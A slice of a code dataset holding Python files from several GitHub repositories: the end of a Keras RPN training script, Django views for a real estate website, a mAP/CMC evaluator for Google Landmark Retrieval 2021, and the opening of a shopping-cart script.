loss={\"c\":rpn_class_loss, \"r\":rpn_regr_loss},\n loss_weights={\"c\" : 1./256, \"r\" : 4*1./900},\n metrics=[tf.keras.metrics.RootMeanSquaredError()])\n\nmodel_checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(\n filepath=r\"D:\\Til data\\rpn\\rpn_finetuned_best.h5\",\n save_weights_only=False,\n monitor='val_loss',\n mode='auto',\n save_best_only=True)\nearlystopping = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=15)\nreduce_lr = tf.keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=7, min_lr=1e-8)\n\nrpn.fit(x=val_x,\n y={\"c\" : class_y, \"r\" : regr_y}, \n batch_size=4,\n epochs=50, \n validation_split = 0.2,\n callbacks=[earlystopping, model_checkpoint_callback, reduce_lr],\n verbose = 1)\n\n\nrpn.save(r\"D:\\Til data\\rpn\\rpn_final.h5\")","repo_name":"clyveycui/TIL2020-CV-","sub_path":"CV Learning/CV Learning/rpn_training.py","file_name":"rpn_training.py","file_ext":"py","file_size_in_byte":7443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32648983160","text":"from django.http import BadHeaderError, HttpResponse, HttpResponseRedirect,FileResponse, JsonResponse #fileresponse for pdf return\nfrom django.shortcuts import redirect, render, HttpResponse\n##from justestate.settings import BASE_DIR\nfrom property.models import Property\nfrom broker.models import Broker\nfrom enquiry.models import Enquiry\nfrom contact.models import Contact\nfrom pages.serializers import PropertySerializer\nfrom rest_framework.generics import ListAPIView, CreateAPIView, RetrieveAPIView, UpdateAPIView, DestroyAPIView, ListCreateAPIView, RetrieveUpdateAPIView, RetrieveDestroyAPIView,RetrieveUpdateDestroyAPIView\n\nfrom django.contrib.auth.models import User\nfrom django.conf import settings\nfrom django.contrib.auth import login,authenticate,logout\nfrom django.core.mail import send_mail,EmailMessage\nfrom landestate.forms import RegistrationForm,ContactForm\nfrom django.core.files.storage import FileSystemStorage\nfrom django.contrib import messages\n\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import Group\n\n#filters\nfrom pages.filters import PropertyFilter\n\nimport base64\n\n#from pages.serializer import PropertySerializer\n# decorators\nfrom pages.decorators import allowed_users, unauthenticateduser,loginfirst\n# for pagination #not in use pagination is done manually\nfrom django.core.paginator import Paginator\n\nimport math\nimport time\n\n#razorpay import\n\nfrom django.views.decorators.csrf import csrf_exempt\n\n#filter and index page\ndef index(request):\n user_visits=request.session.get('user_visits', 0)\n print(user_visits)\n request.session['user_visits'] = user_visits + 1\n #print(request.session['_auth_user_id'])\n #request.session.clear()\n #request.session.flush()\n #print(request.session.items())\n #print(dir(request.session))\n \n \n \n property_list=Property.objects.all().order_by('-id')[0:6:1]\n property_filter=PropertyFilter()\n context={\"property_filter\":property_filter,\"property_list\":property_list}\n if request.method==\"POST\":\n property_list=Property.objects.all()\n\n property_filter=PropertyFilter(request.POST,queryset=property_list)\n property_list=property_filter.qs\n\n paginator = Paginator(property_list, 4) \n page_number = request.GET.get('page')\n property_list = paginator.get_page(page_number)\n context={\n \"property_filter\": property_filter,\n \"property_list\": property_list,\n \n }\n return render(request,\"pages/properties.html\",context)\n\n \n return render(request,\"pages/index.html\",context)\n\n\ndef about_us(request):\n return render(request,\"pages/about_us.html\")\n#property detials dashboar\n\n@loginfirst\n@allowed_users(allowed_roles=['admin'])\ndef user_details(request):\n\n ##Django pagination is good but doesnt work well with AJAX soo....applying manual pagination\n # paginator=Paginator(users_list,10) #show 10 users per page\n # page_number=request.GET.get(\"page\") #anchor tag href value from html page, get its value to get page number\n # users = paginator.get_page(page_number)\n page_number=1\n # when page is loaded page value is not given so we need to manually assign page number to avoid type error\n if request.GET.get(\"page\") is None:\n page_number=1\n print(\"page is NONE\")\n else:\n page_number=int(request.GET.get(\"page\"))\n print(\"page is available\")\n\n print(\"page_number\", page_number)\n # this line so when page value exceeds it converts it to last page value\n last_page_number=int(math.ceil(len(User.objects.all())/10))\n if page_number > last_page_number:\n page_number=last_page_number\n\n #print(\"page_number===\",page_number)\n #pagination math for slicing object set\n print(page_number)\n if page_number is None:\n users = User.objects.all()[0:10:1]\n else:\n for i in range(1,page_number+1):\n if(i==page_number):\n global start_list\n global end_list\n \n start_list=(page_number * 10)-10\n end_list=page_number * 10\n \n print(start_list)\n print(end_list)\n\n users = User.objects.all()[start_list:end_list:1]\n \n # print(users)\n # print(type(users))\n \n form=RegistrationForm()\n \n context={\"users\":users,\"form\":form,\"page_number\":page_number,\"last_page_number\":last_page_number}\n return render(request,\"pages/user_details.html\",context)\n\n#display the list of properties for user or any viewer\n#goes to properties html\ndef property_list_display(request):\n property_list = Property.objects.all().order_by('-id')\n paginator = Paginator(property_list, 2) \n\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n \n context={'page_obj':page_obj}\n return render(request,\"pages/properties.html\",context)\n\n#displaying the all details of single property\ndef property_details(request,slug):\n property_details= Property.objects.get(slug=slug)\n print(property_details)\n context={\"property_details\":property_details}\n return render(request, \"pages/property_details.html\",context)\n\n#User registration # add user through registration page\n@unauthenticateduser\ndef registration(request): \n form=RegistrationForm()\n print(vars(form))\n context={}\n if request.method==\"POST\":\n \n #create form object\n form=RegistrationForm(request.POST) \n print(vars(form))\n for field in form:\n print(\"Field Error:\", field.name, field.errors)\n print(form.is_valid())\n if form.is_valid(): \n print(\"form is valid\")\n user=form.save()\n username=form.cleaned_data.get(\"username\")\n #assign user to a group # you will see this commented code in signals \n # group= Group.objects.get(name=\"usergroup\")\n \n # user.groups.add(group)\n messages.success(request,\"User registered successful: \"+username)\n return HttpResponseRedirect('/user_login/')\n else:\n form_err=form.errors\n context={\"form_err\":form_err,\"form\":form}\n return render(request,\"pages/registration.html\",context)\n \n \n context['form']= form\n \n return render(request,\"pages/registration.html\",context)\n\n#user login\n@unauthenticateduser\ndef user_login(request):\n\n if request.method==\"POST\":\n name=request.POST[\"Name\"]\n password=request.POST[\"Password\"]\n\n user=authenticate(request,username=name,password=password)\n\n if user is not None:\n login(request,user)\n return redirect(\"/\")\n else:\n messages.info(request,\"Wrong Credentials\")\n return redirect(\"/user_login\")\n return render(request,\"pages/login.html\")\n\n@loginfirst\ndef user_logout(request):\n logout(request)\n return redirect(\"/user_login\")\n\n#for contacts and mail send\n\ndef contact(request):\n form=ContactForm()\n context={}\n if request.method==\"POST\":\n \n #create form object\n form=ContactForm(request.POST) \n \n \n if form.is_valid():\n print(\"form is valid\")\n form.save()\n \n \n #sending mail to manager\n name=form.cleaned_data[\"name\"]\n email=form.cleaned_data[\"email\"]\n subject=form.cleaned_data[\"subject\"]\n message=form.cleaned_data[\"message\"]\n phone=form.cleaned_data[\"phone\"]\n message=name+\" has shown interest in your property and left a note:\\n\\n\"+message+\"\\nEmail : \"+email+\"\\nPhone Number : \"+phone\n \n\n #get file to save in filestoragesystem for it to send through email\n # filetostorage=request.FILES['files']\n # print(filetostorage)\n # fs=FileSystemStorage()\n # filename=fs.save(filetostorage.name,filetostorage)\n # #get urls\n # filenameurl=fs.url(filename)\n # print(filenameurl)\n \n #Use Gmail's app password by turning 2step verification ON.\n #Then generate new app password.use that pass as USER_HOST_PASSWORD \n email_from=settings.EMAIL_HOST_USER\n email_to=\"sachin.esenceweb@gmail.com\"\n \n #create email object\n email_message= EmailMessage(subject, message, email_from, [email_to])\n \n # email_message.attach(filename,filenameurl)\n # fs.delete(filename)\n \n try:\n #send email\n email_message.send(fail_silently=False)\n messages.success(request,\"Thanks for your Interest, We will contact you soon\")\n\n except BadHeaderError:\n return HttpResponse('Invalid header found.')\n\n return HttpResponseRedirect('/')\n \n \n context['form']= form\n return render(request,\"pages/contact.html\",context)\n \n#property enquiry (new) \ndef property_enquiry(request):\n if request.method==\"POST\":\n print(\"adding enquiry property to database\")\n name=request.POST[\"prop_enq_username\"]\n email=request.POST[\"prop_enq_useremail\"]\n phone=request.POST[\"prop_enq_userphone\"]\n enquired_property=request.POST[\"enquired_property\"]\n\n enquiryinstance=Enquiry(visitor_name=name, visitor_email=email, visitor_phone=phone)\n enquiryinstance.property_enquired_id=enquired_property\n enquiryinstance.save()\n\n email_from=settings.EMAIL_HOST_USER\n email_to=\"sachin.esenceweb@gmail.com\"\n message=name+\" made an enquiry about \"+enquiryinstance.property_enquired.title+\"\\nEmail : \"+email +\"\\nPhone : \"+ phone\n\n email_message= EmailMessage(\"About User enquiry for Property\",message, email_from, [email_to,email])\n try:\n #send email\n email_message.send(fail_silently=False)\n except BadHeaderError:\n return HttpResponse('Invalid header found.')\n\n messages.success(request,\"Thanks for your Interest, We will contact you soon\")\n return HttpResponseRedirect('/')\n else:\n return HttpResponseRedirect('/property_details')\n\nclass PropertyList(ListAPIView):\n queryset= Property.objects.all()\n serializer_class = PropertySerializer\n\nclass PropertyCreate(CreateAPIView):\n queryset= Property.objects.all()\n serializer_class = PropertySerializer\n\nclass PropertyRetrieve(RetrieveAPIView):\n queryset= Property.objects.all()\n serializer_class = PropertySerializer\n\nclass PropertyUpdate(UpdateAPIView):\n queryset= Property.objects.all()\n serializer_class = PropertySerializer\n\nclass PropertyDestroy(DestroyAPIView):\n queryset= Property.objects.all()\n serializer_class = PropertySerializer\n\nclass PropertyListCreate(ListCreateAPIView):\n queryset= Property.objects.all()\n serializer_class = PropertySerializer\n\nclass PropertyRetrieveUpdate(RetrieveUpdateAPIView):\n queryset= Property.objects.all()\n serializer_class = PropertySerializer\n\nclass PropertyRetrieveDestroy(RetrieveDestroyAPIView):\n queryset= Property.objects.all()\n serializer_class = PropertySerializer\n\nclass PropertyRetrieveUpdateDestroy(RetrieveUpdateDestroyAPIView):\n queryset= Property.objects.all()\n serializer_class = PropertySerializer","repo_name":"sachin30/landestate","sub_path":"pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4075006842","text":"\"\"\"Eval CBIR.\nAuthor: gongyou.zyq\nDate: 2020.11.25\n\"\"\"\n\nimport os\nimport pickle\nimport shutil\nimport time\n\nimport cv2\nimport numpy as np\n\n\nclass CBIREvaluator():\n \"\"\"CBIR Evaluator.\"\"\"\n\n def __init__(self):\n self.query_instance_dic = pickle.load(open('GLDv2_search_label_competition_2021.pkl', 'rb'))\n self.selected_test_id = list(self.query_instance_dic.keys())\n self.result_dic = self.init_result_dic()\n self.search_dir = '../input/landmark-retrieval-2021/index/'\n self.query_dir = '../input/landmark-retrieval-2021/test/'\n self.VERBOSE = False\n self.MAP_METRIC = 'retrieval'\n self.VIS_FLAG = False\n self.VIS_TOPK = 20\n self.RANK_GLOBAL_TOPK = [1, 5, 10, 20, 100]\n\n @staticmethod\n def init_result_dic():\n \"\"\"Set empty dic to cache results.\"\"\"\n\n result_dic = {'gt_num_list': [], 'best_recall_list': [],\n 'upper_bound_list': [], 'best_thr_list': [],\n 'proposal_recall_list': [], 'pred_num_list': [],\n 'cmc_list': [], 'ap_list': [],\n 'prec_list': [], 'rec_list': [],\n 'out_prec_list': [], 'out_rec_list': []}\n return result_dic\n\n def output_final_result(self):\n \"\"\"Output final result.\"\"\"\n\n mean_largest_recall = np.mean(self.result_dic['best_recall_list'])\n mean_bound = np.mean(self.result_dic['upper_bound_list'])\n mean_thr = np.mean(self.result_dic['best_thr_list'])\n mean_gt_num = np.mean(self.result_dic['gt_num_list'])\n mean_ap = np.mean(self.result_dic['ap_list'])\n mean_proposal_recall = np.mean(self.result_dic['proposal_recall_list'],\n axis=0)\n mean_pred_num = np.mean(self.result_dic['pred_num_list'])\n # np.save('./tests/localizer/average_recall_%s' % \\\n # self._cfg.EVAL.SIM_MODE, mean_topk_recall)\n mean_cmc = np.mean(self.result_dic['cmc_list'], axis=0)\n mean_prec = np.mean(self.result_dic['out_prec_list'], axis=0)\n mean_rec = np.mean(self.result_dic['out_rec_list'], axis=0)\n mean_cmc = np.round(mean_cmc, 4)\n mean_prec = np.round(mean_prec, 4)\n mean_rec = np.round(mean_rec, 4)\n sim_mode = self.MAP_METRIC\n cmc_list = self.result_dic['cmc_list']\n print(f'----------Final Results for sim_mode: {sim_mode}------------')\n print(f'Total valid query num: {len(cmc_list)}')\n print('detection metric: ')\n print(f'average_gt_num: {mean_gt_num:.1f}, '\n f'average pred num: {mean_pred_num:.1f} '\n f'largest recall: {mean_largest_recall:.4f}, '\n f' average upper bound: {mean_bound:.1f}, '\n f'mean_thr: {mean_thr:.4f}')\n print(f'ranking metric for global {self.RANK_GLOBAL_TOPK}: ')\n print(f'CMC: {mean_cmc}, mAP: {mean_ap:.4f}')\n print(f'mean precision: {mean_prec}, mean recall: {mean_rec}')\n\n def log_info(self, info_str):\n \"\"\"Log verbose info.\"\"\"\n\n if self.VERBOSE:\n print(info_str)\n\n # pylint:disable=too-many-locals\n def eval_data(self, all_reid_info):\n \"\"\"Eval data.\"\"\"\n\n start_time = time.time()\n for query_instance_id in self.selected_test_id:\n self.log_info('----------eval query_instance_id: '\n f'{query_instance_id}----------')\n if len(self.query_instance_dic[query_instance_id]) == 0:\n self.log_info('invalid query, skip eval this query')\n continue\n\n gt_info = self.load_gt_info(query_instance_id)\n gt_num = gt_info['gt_num']\n self.result_dic['gt_num_list'].append(gt_num)\n if gt_num == 0:\n self.log_info('gt_num=0, skip eval this query')\n continue\n pred_info = self.postprocess_pred_info(query_instance_id,\n all_reid_info)\n res = self.get_matching_flag(gt_info, pred_info)\n [tp_flag, fp_flag, thrs, gt_matched_flag, valid_flag] = res\n rec, prec = self.get_pr(tp_flag, fp_flag, gt_num)\n if len(rec) == 0:\n print('empty pred, put all zeros')\n rec = np.array([0.0])\n prec, thrs, tp_flag = rec.copy(), rec.copy(), rec.copy()\n pad_lenth = 100\n if len(rec) < pad_lenth:\n # print('pad data')\n rec = np.pad(rec, (0, pad_lenth-len(rec)), 'edge')\n prec = np.pad(prec, (0, pad_lenth-len(prec)))\n thrs = np.pad(thrs, (0, pad_lenth-len(thrs)))\n tp_flag = np.pad(tp_flag, (0, pad_lenth-len(tp_flag)))\n unmatched_data_list = self.get_unmatched(query_instance_id,\n gt_matched_flag)\n self.get_det_eval(rec, prec, thrs)\n self.get_rank_eval(rec, prec, tp_flag, gt_num)\n if self.VERBOSE:\n self.output_current_result(query_instance_id, tp_flag,\n valid_flag)\n\n if self.VIS_FLAG:\n trimmed_pred = [tp_flag, pred_info, valid_flag]\n self.vis_retrieval(query_instance_id, unmatched_data_list,\n trimmed_pred)\n print(f'{time.time() - start_time:.4f} seconds to eval all data')\n\n def output_current_result(self, query_instance_id, tp_flag, valid_flag):\n \"\"\"Output current result.\"\"\"\n\n matched_tp_index = np.argwhere(tp_flag > 0).flatten()\n print(f'matched tp index: {matched_tp_index}')\n sim_mode = self.MAP_METRIC\n best_recall = round(self.result_dic['best_recall_list'][-1], 4)\n upper_bound = round(self.result_dic['upper_bound_list'][-1], 4)\n best_thr = round(self.result_dic['best_thr_list'][-1], 4)\n gt_num = self.result_dic['gt_num_list'][-1]\n proposal_recall = self.result_dic['proposal_recall_list'][-1]\n cmc = self.result_dic['cmc_list'][-1]\n average_precision = self.result_dic['ap_list'][-1]\n out_prec = self.result_dic['out_prec_list'][-1]\n out_rec = self.result_dic['out_rec_list'][-1]\n print(f'sim_mode: {sim_mode}, data_shape: {valid_flag.shape}')\n print(f'best recall: {best_recall}, upper bound: {upper_bound}, '\n f'thr: {best_thr}, gt_num: {gt_num}, '\n f'proposal recall: {proposal_recall:.4f}')\n print(f'CMC: {cmc}, AP: {average_precision}')\n print(f'precision: {out_prec}, recall: {out_rec}')\n\n def load_gt_info(self, query_instance_id):\n \"\"\"Load gt.\"\"\"\n\n query_bbox_dic = self.query_instance_dic[query_instance_id]\n gt_bbox_dic = {}\n gt_matched_flag = {}\n gt_num = 0\n # query image should always be ignored whatever separate camera or not\n ignore_list = [query_bbox_dic['image_name']]\n\n gt_data_list = query_bbox_dic['pos_gallery_list']\n separate_cam = False\n for gt_data in gt_data_list:\n device_id = gt_data['device_id']\n image_name = gt_data['image_name']\n gt_bbox_dic[image_name] = gt_data['bbox']\n\n if gt_data['ignore']:\n ignore_list.append(image_name)\n if separate_cam and device_id != query_bbox_dic['device_id'] \\\n and not gt_data['ignore']:\n gt_num += 1\n gt_matched_flag[image_name] = 0\n if not separate_cam and not gt_data['ignore'] and\\\n image_name != query_bbox_dic['image_name']:\n gt_num += 1\n gt_matched_flag[image_name] = 0\n if image_name == query_bbox_dic['image_name']:\n ignore_list.append(image_name)\n if separate_cam and device_id == query_bbox_dic['device_id']:\n ignore_list.append(image_name)\n gt_info = {'gt_num': gt_num, 'gt_bbox_dic': gt_bbox_dic,\n 'gt_matched_flag': gt_matched_flag,\n 'ignore_list': ignore_list}\n return gt_info\n\n\n def load_local_proposal(self, loc_gallery_bbox_dic):\n \"\"\"Keep topk per large image for eval localizer.\"\"\"\n\n merged_bboxes = []\n merged_sims = []\n unique_image_ids = []\n repeat_times = []\n keep_num = 1\n for image_name, loc_pred_for_large in loc_gallery_bbox_dic.items():\n loc_pred_for_large = loc_gallery_bbox_dic[image_name]\n if len(loc_pred_for_large['sim']) == 0:\n continue\n indexes = np.argsort(-loc_pred_for_large['sim'])[:keep_num]\n merged_bboxes.append(loc_pred_for_large['bbox'][indexes])\n merged_sims.append(loc_pred_for_large['sim'][indexes])\n repeat_times.append(len(indexes))\n unique_image_ids.append(image_name)\n merged_bboxes = np.concatenate(merged_bboxes)\n merged_sims = np.concatenate(merged_sims)\n image_ids = np.repeat(unique_image_ids, repeat_times)\n return {'sim': merged_sims,\n 'bbox': merged_bboxes,\n 'image_name': image_ids}\n\n def postprocess_pred_info(self, query_instance_id, all_reid_info):\n \"\"\"Postprocess pred info (How to modify proposal).\"\"\"\n\n pred_dic = all_reid_info[query_instance_id]\n pred_dic = self.load_local_proposal(pred_dic)\n pred_info = self.re_sort(pred_dic)\n return pred_info\n\n def re_sort(self, pred_dic):\n \"\"\"Resort data.\"\"\"\n\n # Ref: https://zhuanlan.zhihu.com/p/37910324\n pred_sim = pred_dic['sim']\n pred_bboxes = np.array(pred_dic['bbox'])\n image_ids = np.array(pred_dic['image_name'])\n\n sorted_ind = np.argsort(-pred_sim)\n sorted_sim = pred_sim[sorted_ind]\n pred_bboxes = pred_bboxes[sorted_ind, :]\n # image_ids = [image_ids[x] for x in sorted_ind]\n image_ids = image_ids[sorted_ind]\n pred_info = {'pred_bboxes': pred_bboxes, 'image_ids': image_ids,\n 'sorted_sim': sorted_sim}\n self.result_dic['pred_num_list'].append(len(pred_bboxes))\n return pred_info\n\n\n @staticmethod\n def get_pr(tp_flag, fp_flag, gt_num):\n \"\"\"Get pr.\"\"\"\n\n fp_flag = np.cumsum(fp_flag)\n tp_flag = np.cumsum(tp_flag)\n # if len(tp_flag) == 0:\n # return 0.0, 0.0\n rec = tp_flag / float(gt_num)\n # avoid divide by zero in case the first detection matches\n # a difficult ground truth\n prec = tp_flag / np.maximum(tp_flag+fp_flag, np.finfo(np.float64).eps)\n # print(rec[:20])\n # print(prec[:20])\n return rec, prec\n\n def get_det_eval(self, rec, prec, thrs):\n \"\"\"Get det eval\"\"\"\n\n rank_index = np.arange(1, len(rec)+1)\n best_recall = np.max(rec)\n upper_bound = np.min(rank_index[rec == best_recall])\n best_thr = thrs[upper_bound-1]\n proposal_recall = rec[-1]\n\n out_rec, out_prec = self.refine_pr(rec, prec)\n self.result_dic['best_recall_list'].append(best_recall)\n self.result_dic['upper_bound_list'].append(upper_bound)\n # Clip data for speed purpose\n self.result_dic['best_thr_list'].append(best_thr)\n self.result_dic['proposal_recall_list'].append(proposal_recall)\n self.result_dic['out_rec_list'].append(out_rec)\n self.result_dic['out_prec_list'].append(out_prec)\n self.result_dic['rec_list'].append(rec)\n self.result_dic['prec_list'].append(prec)\n\n def get_rank_eval(self, rec, prec, tp_flag, gt_num):\n \"\"\"Get rank eval\"\"\"\n\n # NOTE: will clip ranklist by RANK_GLOBAL_TOPK\n if self.MAP_METRIC == 'delg':\n average_precision = self.delg_ap(tp_flag, gt_num)\n elif self.MAP_METRIC == 'voc':\n average_precision = self.voc_ap(rec, prec)\n elif self.MAP_METRIC == 'retrieval':\n average_precision = self.retrieval_ap(tp_flag, gt_num)\n else:\n print('Unknown ranking evaluation metric')\n return\n global_top_k = np.array(self.RANK_GLOBAL_TOPK) - 1\n max_eval_rank = self.RANK_GLOBAL_TOPK[-1]\n tp_flag = np.cumsum(tp_flag)\n if len(tp_flag) >= max_eval_rank:\n cmc = (tp_flag[:max_eval_rank] > 0).astype('int')\n cmc = cmc[global_top_k].astype('float32')\n self.result_dic['cmc_list'].append(cmc)\n self.result_dic['ap_list'].append(average_precision)\n else:\n print('too few predictions for ranking evaluation')\n\n def refine_pr(self, rec, prec):\n \"\"\"Refine pr.\"\"\"\n\n global_top_k = np.array(self.RANK_GLOBAL_TOPK) - 1\n out_rec = rec[global_top_k].astype('float32')\n out_prec = prec[global_top_k].astype('float32')\n # when compute for mAP, we use real precision and recall.\n # When compute for precision@K and recall@K, we foloow delg.\n # If `desired_pr_rank` is larger than last positive's rank,only compute\n # precision with respect to last positive's position.\n\n # pylint: disable=line-too-long\n # See https://github.com/tensorflow/models/blob/master/research/delf/delf/python/detect_to_retrieve/dataset.py for ComputePRAtRanks # noqa\n finish_indexes = np.argwhere(rec == 1.0).flatten()\n if len(finish_indexes) > 0:\n first_finish_index = finish_indexes.min()\n if first_finish_index <= global_top_k[1]:\n out_prec[1] = prec[first_finish_index]\n out_prec[2] = prec[first_finish_index]\n out_prec[3] = prec[first_finish_index]\n if global_top_k[1] < first_finish_index <= global_top_k[2]:\n out_prec[2] = prec[first_finish_index]\n out_prec[3] = prec[first_finish_index]\n if global_top_k[2] < first_finish_index <= global_top_k[3]:\n out_prec[3] = prec[first_finish_index]\n return out_rec, out_prec\n\n @staticmethod\n def voc_ap(rec, prec, use_07_metric=False):\n \"\"\"Compute VOC AP given precision and recall. If use_07_metric is true,\n uses the VOC 07 11-point method (default:False).\n \"\"\"\n\n # pylint: disable=invalid-name\n if use_07_metric:\n ap = 0.\n for t in np.arange(0., 1.1, 0.1):\n if np.sum(rec >= t) == 0:\n p = 0\n else:\n p = np.max(prec[rec >= t])\n ap = ap + p / 11.\n else:\n # correct AP calculation\n # first append sentinel values at the end\n mrec = np.concatenate(([0.], rec, [1.]))\n mpre = np.concatenate(([0.], prec, [0.]))\n\n # compute the precision\n for i in range(mpre.size - 1, 0, -1):\n mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])\n\n # to calculate area under PR curve, look for points\n # where X axis (recall) changes value\n i = np.where(mrec[1:] != mrec[:-1])[0]\n\n # and sum (\\Delta recall) * prec\n ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])\n return ap\n\n @staticmethod\n def delg_ap(tp_flag, gt_num):\n \"\"\"DELG official code for mAP, the convention for the Revisited\n Oxford/Paris datasets.\n \"\"\"\n\n positive_ranks = np.where(tp_flag == 1)[0]\n average_precision = 0.0\n\n num_expected_positives = gt_num\n if not num_expected_positives:\n return average_precision\n\n recall_step = 1.0 / num_expected_positives\n for i, rank in enumerate(positive_ranks):\n if not rank:\n left_precision = 1.0\n else:\n left_precision = i / rank\n\n right_precision = (i + 1) / (rank + 1)\n average_precision += (left_precision + right_precision) * recall_step / 2\n\n return average_precision\n\n @staticmethod\n def retrieval_ap(tp_flag, gt_num):\n \"\"\"Retrieval mAP, widely used in person reid.\n \"\"\"\n\n positive_ranks = np.where(tp_flag == 1)[0]\n average_precision = 0.0\n\n num_expected_positives = gt_num\n if not num_expected_positives:\n return average_precision\n\n recall_step = 1.0 / num_expected_positives\n for i, rank in enumerate(positive_ranks):\n right_precision = (i + 1) / (rank + 1)\n average_precision += right_precision * recall_step\n\n return average_precision\n\n def _vis_query(self, query_large_path, query_bbox, save_dir):\n \"\"\"Vis query.\"\"\"\n\n img = self.draw_bbox(query_large_path, query_bbox, (255, 0, 0))\n if query_bbox is not None:\n cv2.putText(img, 'query',\n (int(query_bbox[0]), int(query_bbox[1])),\n cv2.FONT_HERSHEY_COMPLEX, 2, (0, 0, 255), 2)\n cv2.imwrite(os.path.join(save_dir, 'query.jpg'), img)\n\n @staticmethod\n def draw_bbox(image_path, bbox, color):\n \"\"\"Draw bbox.\"\"\"\n\n img = cv2.imread(image_path)\n if bbox is not None:\n [x1, y1, x2, y2] = bbox # pylint:disable=invalid-name\n cv2.rectangle(img, (int(x1), int(y1)), (int(x2), int(y2)), color, 2)\n return img\n\n # pylint: disable=too-many-locals\n def _vis_gallery(self, trimmed_pred, save_dir):\n \"\"\"Vis gallery.\"\"\"\n\n [tp_flag, pred_info, valid_flag] = trimmed_pred\n bbox_list = pred_info['pred_bboxes'][valid_flag]\n sim = pred_info['sorted_sim'][valid_flag]\n image_ids = pred_info['image_ids'][valid_flag]\n for index, image_name in enumerate(image_ids):\n image_name = os.path.basename(image_name)\n short_dir = f'{image_name[0]}/{image_name[1]}/{image_name[2]}'\n sim_str = '%.4f' % sim[index]\n gal_bbox = bbox_list[index].astype('int')\n prefix = image_name.replace('/', '_')[:-4]\n string = f'{gal_bbox[0]}_{gal_bbox[1]}_{gal_bbox[2]}_{gal_bbox[3]}'\n save_name = f'{sim_str}_{prefix}_bbox_{string}.jpg'\n old_path = os.path.join(self.search_dir,\n short_dir,\n image_name)\n if not tp_flag[index] and index < self.VIS_TOPK:\n img = self.draw_bbox(old_path, gal_bbox, (255, 0, 0))\n elif tp_flag[index]:\n img = self.draw_bbox(old_path, gal_bbox, (0, 255, 0))\n save_name = save_name.split('.jpg')[0] + '_matched.jpg'\n else:\n continue\n cv2.putText(img, sim_str, (int(gal_bbox[0]), int(gal_bbox[1])),\n cv2.FONT_HERSHEY_COMPLEX, 2, (0, 0, 255), 2)\n cv2.imwrite(os.path.join(save_dir, save_name), img)\n\n def _vis_unmatched(self, unmatched_data_list, save_dir):\n \"\"\"Vis unmatched results beyond top-k.\"\"\"\n\n for unmatched_data in unmatched_data_list:\n image_name = unmatched_data['image_name']\n image_name = os.path.basename(image_name)\n short_dir = f'{image_name[0]}/{image_name[1]}/{image_name[2]}'\n save_name = 'missed_' + image_name.replace('/', '_')\n image_path = os.path.join(self.search_dir,\n short_dir,\n image_name)\n img = self.draw_bbox(image_path, unmatched_data['bbox'],\n (0, 0, 255))\n cv2.imwrite(os.path.join(save_dir, save_name), img)\n\n def get_unmatched(self, query_instance_id, gt_matched_flag):\n \"\"\"Get unmatched gt.\"\"\"\n\n query_bbox_dic = self.query_instance_dic[query_instance_id]\n gt_data_list = query_bbox_dic['pos_gallery_list']\n unmatched_gt_name_list = []\n for image_name in gt_matched_flag:\n if gt_matched_flag[image_name] == 0:\n unmatched_gt_name_list.append(image_name)\n unmatched_data_list = []\n for gt_data in gt_data_list:\n image_name = gt_data['image_name']\n if image_name in unmatched_gt_name_list:\n unmatched_data_list.append(gt_data)\n return unmatched_data_list\n\n def vis_retrieval(self, query_instance_id, unmatched_data_list,\n trimmed_pred):\n \"\"\"Vis retrieval.\"\"\"\n\n image_name = self.query_instance_dic[query_instance_id]['image_name']\n image_name = os.path.basename(image_name)\n short_dir = f'{image_name[0]}/{image_name[1]}/{image_name[2]}'\n query_large_path = os.path.join(self.query_dir, short_dir, image_name)\n save_dir = f'./tests/images/vis_pred/{query_instance_id}/'\n if os.path.exists(save_dir):\n shutil.rmtree(save_dir)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n query_bbox = None\n self._vis_query(query_large_path, query_bbox, save_dir)\n self._vis_gallery(trimmed_pred, save_dir)\n self._vis_unmatched(unmatched_data_list, save_dir)\n\n def get_matching_flag(self, gt_info, pred_info):\n \"\"\"Get matching flag\"\"\"\n\n image_ids = pred_info['image_ids']\n sorted_sim = pred_info['sorted_sim']\n ignore_list = gt_info['ignore_list']\n gt_bbox_dic = gt_info['gt_bbox_dic']\n gt_matched_flag = gt_info['gt_matched_flag']\n\n gt_name_list = list(gt_bbox_dic.keys())\n valid_flag = np.zeros(len(image_ids))\n tp_flag = valid_flag.copy()\n fp_flag = valid_flag.copy()\n thrs = valid_flag.copy()\n for rank, image_name in enumerate(image_ids):\n if image_name not in ignore_list:\n valid_flag[rank] = 1\n thrs[rank] = sorted_sim[rank]\n if image_name in gt_name_list:\n tp_flag[rank] = 1.\n gt_matched_flag[image_name] = 1\n else:\n fp_flag[rank] = 1.\n tp_flag = tp_flag[valid_flag > 0]\n fp_flag = fp_flag[valid_flag > 0]\n thrs = thrs[valid_flag > 0]\n valid_flag = np.where(valid_flag>0)[0]\n return tp_flag, fp_flag, thrs, gt_matched_flag, valid_flag\n\n\ndef main():\n \"\"\"Main method\"\"\"\n\n all_reid_info = pickle.load(open('submission.pkl', 'rb'))\n\n cbir_evaluator = CBIREvaluator()\n cbir_evaluator.eval_data(all_reid_info)\n cbir_evaluator.output_final_result()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"WesleyZhang1991/Google_Landmark_Retrieval_2021_2nd_Place_Solution","sub_path":"submission/eval/eval_cbir.py","file_name":"eval_cbir.py","file_ext":"py","file_size_in_byte":22428,"program_lang":"python","lang":"en","doc_type":"code","stars":233,"dataset":"github-code","pt":"48"} +{"seq_id":"14987771880","text":"\"\"\"This is main logic.\"\"\"\n\nfrom second_logic import userDisplayMenuWindow, userWindow, catalogView, shopping, temp\n\n\ndef user_id():\n \"\"\"This function works with the entered id.\n \"\"\"\n userDisplayMenuWindow()\n p_id = int(input(\"\\nEnter the id : \"))\n\n\ndef removeCart():\n \"\"\"This function is responsible for removing an item from the shopping cart.\n 